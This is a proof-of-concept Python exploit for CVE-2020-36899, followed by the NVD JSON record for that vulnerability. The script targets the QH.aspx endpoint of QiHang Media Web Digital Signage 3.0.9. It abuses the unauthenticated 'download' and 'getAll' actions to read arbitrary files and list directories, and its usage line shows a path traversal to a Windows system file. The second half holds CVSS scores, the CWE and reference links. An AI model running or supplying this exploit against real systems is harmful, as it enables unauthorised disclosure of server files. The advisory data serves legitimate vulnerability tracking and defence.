CVE-2020-36899

# CVE-2020-36899 PoC - QiHang Media Web Unauthenticated File Disclosure # Target: QiHang Media Web Digital Signage 3.0.9 # Endpoint: QH.aspx import requests import sys def exploit_file_disclosure(target_url, filename): """ Exploit the unauthenticated file disclosure vulnerability Args: target_url: Base URL of the vulnerable application filename: File path to read (supports path traversal) """ # Try download action download_params = { 'action': 'download', 'filename': filename } print(f"[*] Attempting to read: {filename}") print(f"[*] Using download action...") try: response = requests.get(f"{target_url}/QH.aspx", params=download_params, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[+] Success! File content:") print(response.text[:1000]) # Print first 1000 chars return True else: print(f"[-] Download action failed, trying getAll action...") # Try getAll action for directory listing getall_params = { 'action': 'getAll', 'path': filename } response = requests.get(f"{target_url}/QH.aspx", params=getall_params, timeout=10) if response.status_code == 200: print(f"[+] Directory listing success!") print(response.text) return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2020-36899.py <target_url> ") print("Example: python cve-2020-36899.py http://target.com ../../../../windows/system32/drivers/etc/hosts") sys.exit(1) target = sys.argv[1] filename = sys.argv[2] exploit_file_disclosure(target, filename)

{"cve": {"id": "CVE-2020-36899", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:02.513", "lastModified": "2025-12-17T19:01:53.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QiHang Media Web Digital Signage 3.0.9 contains an unauthenticated file disclosure vulnerability that allows remote attackers to access sensitive files through unverified 'filename' and 'path' parameters. Attackers can exploit the QH.aspx endpoint to read arbitrary files and directory contents without authentication by manipulating download and getAll actions."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-530"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:howfor:qihang_media_web_digital_signage:3.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "7986DE52-67FF-4879-875B-18D56E480460"}]}]}], "references": [{"url": "http://www.howfor.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/48750", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/qihang-media-web-digital-signage-unauthenticated-arbitrary-file-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/48750", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}